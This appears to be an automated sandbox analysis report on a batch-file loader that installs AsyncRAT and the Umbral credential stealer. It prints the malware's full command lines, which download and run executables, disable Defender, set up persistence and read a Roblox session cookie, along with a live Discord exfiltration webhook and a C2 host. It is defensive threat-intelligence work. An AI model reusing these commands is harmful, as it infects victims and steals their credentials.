asyncrat | 5fbc4bddd26765b3c6f1b0ab2af444bf72f6e589ac6d289db2e4b7c8b195874e

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

1KB
MD5

de5a66871a7e14fe1c7d56db9aa2e8e5
SHA1

c119aea04d27dd918b9aa3b734271707098cd022
SHA256

5fbc4bddd26765b3c6f1b0ab2af444bf72f6e589ac6d289db2e4b7c8b195874e
SHA512

24a452d84c478d733c6d0e23d62dfca3e629720542cae36164522bfe631a05d53bafcb91c3f70ccea669c662a5fcb0b728cc56305486c9358e6c60123044e5a5

Score

10^/10

asyncrat umbral default discovery execution rat spyware stealer

Malware Config

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1310577588602667038/v6do4PoA82VdH0edzJ4iW13aksBJ6rEVHVHVO7Qj6EGYvvmguDUqbAezb57n5M3uYTWB

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023c9d-30.dat	family_umbral
behavioral2/memory/4236-35-0x0000029C164F0000-0x0000029C16530000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0008000000023ca2-142.dat	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	4940	powershell.exe
10	4940	powershell.exe
22	3628	powershell.exe
26	3628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4716	powershell.exe
4060	powershell.exe
4940	powershell.exe
3628	powershell.exe
3688	powershell.exe
3584	powershell.exe
2952	powershell.exe
4400	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	output.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Loader.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4236	output.exe
972	Loader.exe
4408	WINDOWS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4476	cmd.exe
4316	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1988	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4432	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4316	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2304	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4940	powershell.exe
4940	powershell.exe
4716	powershell.exe
4716	powershell.exe
3628	powershell.exe
3628	powershell.exe
4236	output.exe
4400	powershell.exe
4400	powershell.exe
3688	powershell.exe
3688	powershell.exe
3584	powershell.exe
3584	powershell.exe
1672	powershell.exe
1672	powershell.exe
2952	powershell.exe
2952	powershell.exe
4060	powershell.exe
4060	powershell.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
972	Loader.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe
4408	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4236	output.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	wmic.exe
Token: SeSecurityPrivilege	4808	wmic.exe
Token: SeTakeOwnershipPrivilege	4808	wmic.exe
Token: SeLoadDriverPrivilege	4808	wmic.exe
Token: SeSystemProfilePrivilege	4808	wmic.exe
Token: SeSystemtimePrivilege	4808	wmic.exe
Token: SeProfSingleProcessPrivilege	4808	wmic.exe
Token: SeIncBasePriorityPrivilege	4808	wmic.exe
Token: SeCreatePagefilePrivilege	4808	wmic.exe
Token: SeBackupPrivilege	4808	wmic.exe
Token: SeRestorePrivilege	4808	wmic.exe
Token: SeShutdownPrivilege	4808	wmic.exe
Token: SeDebugPrivilege	4808	wmic.exe
Token: SeSystemEnvironmentPrivilege	4808	wmic.exe
Token: SeRemoteShutdownPrivilege	4808	wmic.exe
Token: SeUndockPrivilege	4808	wmic.exe
Token: SeManageVolumePrivilege	4808	wmic.exe
Token: 33	4808	wmic.exe
Token: 34	4808	wmic.exe
Token: 35	4808	wmic.exe
Token: 36	4808	wmic.exe
Token: SeIncreaseQuotaPrivilege	4808	wmic.exe
Token: SeSecurityPrivilege	4808	wmic.exe
Token: SeTakeOwnershipPrivilege	4808	wmic.exe
Token: SeLoadDriverPrivilege	4808	wmic.exe
Token: SeSystemProfilePrivilege	4808	wmic.exe
Token: SeSystemtimePrivilege	4808	wmic.exe
Token: SeProfSingleProcessPrivilege	4808	wmic.exe
Token: SeIncBasePriorityPrivilege	4808	wmic.exe
Token: SeCreatePagefilePrivilege	4808	wmic.exe
Token: SeBackupPrivilege	4808	wmic.exe
Token: SeRestorePrivilege	4808	wmic.exe
Token: SeShutdownPrivilege	4808	wmic.exe
Token: SeDebugPrivilege	4808	wmic.exe
Token: SeSystemEnvironmentPrivilege	4808	wmic.exe
Token: SeRemoteShutdownPrivilege	4808	wmic.exe
Token: SeUndockPrivilege	4808	wmic.exe
Token: SeManageVolumePrivilege	4808	wmic.exe
Token: 33	4808	wmic.exe
Token: 34	4808	wmic.exe
Token: 35	4808	wmic.exe
Token: 36	4808	wmic.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeIncreaseQuotaPrivilege	1740	wmic.exe
Token: SeSecurityPrivilege	1740	wmic.exe
Token: SeTakeOwnershipPrivilege	1740	wmic.exe
Token: SeLoadDriverPrivilege	1740	wmic.exe
Token: SeSystemProfilePrivilege	1740	wmic.exe
Token: SeSystemtimePrivilege	1740	wmic.exe
Token: SeProfSingleProcessPrivilege	1740	wmic.exe
Token: SeIncBasePriorityPrivilege	1740	wmic.exe
Token: SeCreatePagefilePrivilege	1740	wmic.exe
Token: SeBackupPrivilege	1740	wmic.exe
Token: SeRestorePrivilege	1740	wmic.exe
Token: SeShutdownPrivilege	1740	wmic.exe
Token: SeDebugPrivilege	1740	wmic.exe
Token: SeSystemEnvironmentPrivilege	1740	wmic.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 4940	3204	cmd.exe	84
PID 3204 wrote to memory of 4940	3204	cmd.exe	84
PID 3204 wrote to memory of 4716	3204	cmd.exe	87
PID 3204 wrote to memory of 4716	3204	cmd.exe	87
PID 3204 wrote to memory of 4236	3204	cmd.exe	90
PID 3204 wrote to memory of 4236	3204	cmd.exe	90
PID 3204 wrote to memory of 3628	3204	cmd.exe	91
PID 3204 wrote to memory of 3628	3204	cmd.exe	91
PID 4236 wrote to memory of 4808	4236	output.exe	93
PID 4236 wrote to memory of 4808	4236	output.exe	93
PID 4236 wrote to memory of 5004	4236	output.exe	96
PID 4236 wrote to memory of 5004	4236	output.exe	96
PID 4236 wrote to memory of 4400	4236	output.exe	98
PID 4236 wrote to memory of 4400	4236	output.exe	98
PID 4236 wrote to memory of 3688	4236	output.exe	102
PID 4236 wrote to memory of 3688	4236	output.exe	102
PID 4236 wrote to memory of 3584	4236	output.exe	104
PID 4236 wrote to memory of 3584	4236	output.exe	104
PID 4236 wrote to memory of 1672	4236	output.exe	106
PID 4236 wrote to memory of 1672	4236	output.exe	106
PID 4236 wrote to memory of 1740	4236	output.exe	108
PID 4236 wrote to memory of 1740	4236	output.exe	108
PID 4236 wrote to memory of 2992	4236	output.exe	110
PID 4236 wrote to memory of 2992	4236	output.exe	110
PID 4236 wrote to memory of 1796	4236	output.exe	112
PID 4236 wrote to memory of 1796	4236	output.exe	112
PID 4236 wrote to memory of 2952	4236	output.exe	114
PID 4236 wrote to memory of 2952	4236	output.exe	114
PID 4236 wrote to memory of 4432	4236	output.exe	116
PID 4236 wrote to memory of 4432	4236	output.exe	116
PID 3204 wrote to memory of 4060	3204	cmd.exe	121
PID 3204 wrote to memory of 4060	3204	cmd.exe	121
PID 4236 wrote to memory of 4476	4236	output.exe	122
PID 4236 wrote to memory of 4476	4236	output.exe	122
PID 4476 wrote to memory of 4316	4476	cmd.exe	124
PID 4476 wrote to memory of 4316	4476	cmd.exe	124
PID 3204 wrote to memory of 972	3204	cmd.exe	126
PID 3204 wrote to memory of 972	3204	cmd.exe	126
PID 972 wrote to memory of 2604	972	Loader.exe	127
PID 972 wrote to memory of 2604	972	Loader.exe	127
PID 972 wrote to memory of 1368	972	Loader.exe	129
PID 972 wrote to memory of 1368	972	Loader.exe	129
PID 2604 wrote to memory of 2304	2604	cmd.exe	131
PID 2604 wrote to memory of 2304	2604	cmd.exe	131
PID 1368 wrote to memory of 1988	1368	cmd.exe	132
PID 1368 wrote to memory of 1988	1368	cmd.exe	132
PID 1368 wrote to memory of 4408	1368	cmd.exe	133
PID 1368 wrote to memory of 4408	1368	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5004	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/drf/releases/download/d/loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Users\Admin\Desktop\output.exe
  C:\Users\Admin\Desktop\output.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4808
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"
    3⤵
    - Views/modifies file attributes
    PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\output.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2992
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2952
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4432
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  PID:4060
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9D2A.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1988
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4e532cfa885cd7b7abee2caa08f0388

SHA1
dd3b80e4b56522e2ee2ec7877f18a1b044c0c47f

SHA256
811bffe99001ffee8acf0932d5a6d7dafa09094d00741623406b11fcaabea665

SHA512
2129fe057424835bc45de848e8191ddf8b8d2fdd242a2924653d4e073988d7fced6def199d4264fee6dcd3b20d6db3b14432e23e60756b93671262f3dc9d104a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
491a952545b66917b0447248db23cea1

SHA1
0ac665eca2edb5db46785b84509bbefcf510ca1a

SHA256
4a5eb66c19fecf2ee2604a3185065300c1f45d1187ede1bfb123f10722b32a21

SHA512
bdddc71a9ef4bf385963b8dd1dbf7905f09b85893e07d718541d6f14dfb0c266e4ffe27bf949e950815c75415c319db6c1ba4c0e41b0f2305ccc0c08b473a6d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9843d1de2b283224f4f4b8730ccc919f

SHA1
c053080262aef325e616687bf07993920503b62b

SHA256
409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

SHA512
13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
03c60b7a8a84935ca1a959144e61b56e

SHA1
a4765ab1c70e591cb43222c94b0b1ff04dd90e7e

SHA256
cef4a7d39811807579471bfcc873c337560481ede3a08c6dd78c751930a02fbf

SHA512
933b046ec252bb7634c3b50ab135d3b26a0ef8103f52c043b4fb636016167ed53a2f5a78354be3c3c2159625cf882865e0d93e2d8362c2e236bc64320017377d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obj5j43d.5i1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9D2A.tmp.bat

Filesize
151B

MD5
0a876b789f41522e88e7a91a6a0e44ea

SHA1
4ca9d8de6834b96786fedb27d1c39b173c246d67

SHA256
893e79ff69b220d2ddb44701da7dcfbde7aa9fff0e6b659e0771b01920198754

SHA512
68a900af6d052a2f255e2bbdbaeb0d358cadbda4f922e288c4b87977db861c7f1369048200b1d6ec5f879099704a396e49f3ea87b1b1755e86a4ecda78dae15b

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
227KB

MD5
96fc8b45a92d736087ac43746a142cf4

SHA1
35999912f4405f21f5068841581d1e1babf55a4b

SHA256
408dca374549b037529ff6b200f1fd3a9105d3f531805213e8750d3f3463ab1a

SHA512
b6938308458eab4412d130c1c0f5b5104f1e98ab714f659ee27d8d033dbbf9608c98f592bedcb6ff51f0f8f6a7fd4f6705783e0fbcdc900d743a8bf6416aaa16

Download Submit
memory/972-146-0x0000000000AA0000-0x0000000000AB6000-memory.dmp

Filesize
88KB

Download
memory/4236-70-0x0000029C30CB0000-0x0000029C30D00000-memory.dmp

Filesize
320KB

Download
memory/4236-108-0x0000029C30BE0000-0x0000029C30BEA000-memory.dmp

Filesize
40KB

Download
memory/4236-69-0x0000029C30C30000-0x0000029C30CA6000-memory.dmp

Filesize
472KB

Download
memory/4236-35-0x0000029C164F0000-0x0000029C16530000-memory.dmp

Filesize
256KB

Download
memory/4236-71-0x0000029C30BB0000-0x0000029C30BCE000-memory.dmp

Filesize
120KB

Download
memory/4236-109-0x0000029C30C10000-0x0000029C30C22000-memory.dmp

Filesize
72KB

Download
memory/4716-18-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/4716-33-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/4716-19-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/4940-11-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/4940-12-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/4940-0-0x00007FFE76443000-0x00007FFE76445000-memory.dmp

Filesize
8KB

Download
memory/4940-6-0x0000013A7A830000-0x0000013A7A852000-memory.dmp

Filesize
136KB

Download
memory/4940-16-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download